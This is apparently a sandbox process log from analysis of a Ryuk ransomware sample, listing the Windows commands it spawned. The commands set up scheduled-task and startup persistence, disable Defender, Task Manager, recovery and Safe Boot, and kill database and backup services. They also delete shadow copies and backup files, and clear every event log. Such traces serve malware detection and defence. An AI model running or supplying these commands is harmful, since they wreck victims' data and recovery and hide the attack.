
Processes

C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe

"C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit

C:\Windows\system32\cmd.exe

cmd.exe /c taskkill /t /f /im sql*

C:\Windows\system32\taskkill.exe

taskkill /f /t /im veeam*

C:\Windows\system32\icacls.exe

icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\taskkill.exe

taskkill /t /f /im sql*

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\ProgramData\RyukReadMe.txt "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

cmd.exe /c vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete

C:\Windows\system32\cmd.exe

cmd.exe /c wmic shadowcopy delete

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\RyukReadMe.txt

C:\Windows\system32\cmd.exe

cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/

C:\Windows\system32\cmd.exe

cmd.exe /c bcdedit /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c wbadmin delete catalog -quiet/

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop avpsus /y

C:\Windows\system32\net.exe

net stop avpsus /y

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop avpsus /y

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet/

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y

C:\Windows\system32\net.exe

net stop McAfeeDLPAgentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop McAfeeDLPAgentService /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop mfewc /y

C:\Windows\system32\net.exe

net stop mfewc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop mfewc /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y

C:\Windows\system32\net.exe

net stop BMR Boot Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BMR Boot Service /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\net.exe

net stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled

C:\Windows\system32\sc.exe

sc config SQLTELEMETRY start=disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\system32\sc.exe

sc config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled

C:\Windows\system32\sc.exe

sc config SQLWriter start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled

C:\Windows\system32\sc.exe

sc config SstpSvc start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM mspub.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM mydesktopqos.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM mydesktopservice.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del %0

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s hrmlog2

C:\Windows\system32\attrib.exe

attrib +h +s hrmlog2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog2

C:\Windows\system32\attrib.exe

attrib +h +s C:\ProgramData\hrmlog2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wevtutil.exe el

C:\Windows\system32\wevtutil.exe

wevtutil.exe el

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Application"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "DebugChannel"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "DirectShowFilterGraph"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "DirectShowPluginControl"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Els_Hyphenation/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "EndpointMapper"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "ForwardedEvents"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "HardwareEvents"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Internet Explorer"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Key Management Service"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MF_MediaFoundationDeviceProxy"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Media Center"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationDeviceProxy"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPerformance"

C:\Windows\system32\wevtutil.exe

